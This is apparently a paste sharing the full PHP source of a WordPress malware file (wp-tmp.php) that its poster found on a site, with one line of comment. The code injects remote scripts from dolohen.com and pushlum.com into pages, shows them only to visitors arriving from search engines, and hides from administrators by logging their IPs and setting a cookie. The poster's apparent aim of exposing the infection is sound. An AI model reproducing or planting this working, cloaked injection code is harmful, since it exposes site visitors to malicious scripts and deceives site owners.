wordpress malware - Dolohen WordPress Malware

1. wordpress malware...
2.  
3. wp-insert/wp-feed.php --> contained my home ip address ?!?!
4.  
5. wp-insert/wp-tmp.php
6.  
7. ini_set('display_errors', 0);
8. error_reporting(0);
9. $wp_auth_key='8a8ddc1122d1170c4a6a2d3e60814900';
10.  
11.  
12.  
13.  
14. if ( ! function_exists( 'slider_option' ) ) {
15.  
16. function slider_option($content){
17. if(is_single())
18. {
19.  
20.  
21.  
22.  
23. $con = '
24. ';
25.  
26. $con2 = '
27.  
28. <script type="text/javascript" src="//dolohen.com/apu.php?zoneid=2222419"></script>
29. <script src="//pushlum.com/ntfc.php?p=2222423" data-cfasync="false" async></script>
30. ';
31.  
32. $content=$content.$con2;
33. }
34. return $content;
35. }
36.  
37. function slider_option_footer(){
38. if(!is_single())
39. {
40.  
41.  
42.  
43.  
44. $con2 = '
45.  
46. <script type="text/javascript" src="//dolohen.com/apu.php?zoneid=2222419"></script>
47. <script src="//pushlum.com/ntfc.php?p=2222423" data-cfasync="false" async></script>
48. ';
49.  
50. echo $con2;
51. }
52. }
53.  
54.  
55.  
56.  
57.  
58.  
59.  
60.  
61. function setting_my_first_cookie() {
62. setcookie( 'wordpress_cf_adm_use_adm',1, time()+3600*24*1000, COOKIEPATH, COOKIE_DOMAIN);
63. }
64.  
65.  
66. if(is_user_logged_in())
67. {
68. add_action( 'init', 'setting_my_first_cookie',1 );
69. }
70.  
71.  
72.  
73.  
74.  
75.  
76.  
77. if( current_user_can('edit_others_pages'))
78. {
79.  
80. if (file_exists(ABSPATH.'wp-includes/wp-feed.php'))
81. {
82. $ip=@file_get_contents(ABSPATH.'wp-includes/wp-feed.php');
83. }
84.  
85. if (stripos($ip, $_SERVER['REMOTE_ADDR']) === false)
86. {
87. $ip.=$_SERVER['REMOTE_ADDR'].'
88. ';
89. @file_put_contents(ABSPATH.'wp-includes/wp-feed.php',$ip);
90.  
91.  
92. }
93.  
94.  
95.  
96. }
97.  
98.  
99.  
100.  
101.  
102.  
103. $ref = $_SERVER['HTTP_REFERER'];
104. $SE = array('google.','/search?','images.google.', 'web.info.com', 'search.','yahoo.','yandex','msn.','baidu','bing.','doubleclick.net','googleweblight.com');
105. foreach ($SE as $source) {
106. if (strpos($ref,$source)!==false) {
107. setcookie("sevisitor", 1, time()+120, COOKIEPATH, COOKIE_DOMAIN);
108. $sevisitor=true;
109. }
110. }
111.  
112.  
113.  
114.  
115.  
116.  
117. if(!isset($_COOKIE['wordpress_cf_adm_use_adm']) && !is_user_logged_in())
118. {
119. $adtxt=@file_get_contents(ABSPATH.'wp-includes/wp-feed.php');
120. if (stripos($adtxt, $_SERVER['REMOTE_ADDR']) === false)
121. {
122. if($sevisitor==true || isset($_COOKIE['sevisitor']))
123. {
124. add_filter('the_content','slider_option');
125. add_action('wp_footer','slider_option_footer');
126. }
127.  
128. }
129.  
130. }
131.  
132.  
133.  
134.  
135.  
136. }